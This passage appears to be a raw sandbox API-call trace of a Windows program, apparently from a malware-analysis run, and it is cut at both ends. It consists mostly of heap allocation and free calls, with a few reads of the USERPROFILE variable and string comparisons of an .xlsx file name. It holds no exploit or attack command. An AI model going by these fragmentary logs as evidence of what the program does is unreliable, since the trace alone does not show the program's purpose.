RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0220.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0220.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0220.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RRwZ.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RwZ.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wZ.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0220.229] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0220.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0220.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0220.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RRwZ.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RwZ.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wZ.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0220.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0220.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.230] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0220.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.230] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0220.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.230] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0220.231] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaed0 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0220.231] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0220.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0220.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0220.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854218 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0220.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0220.233] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.233] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0220.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0220.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854380 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0220.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0220.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0220.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0220.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0220.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0220.236] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.236] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.236] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0220.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0220.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 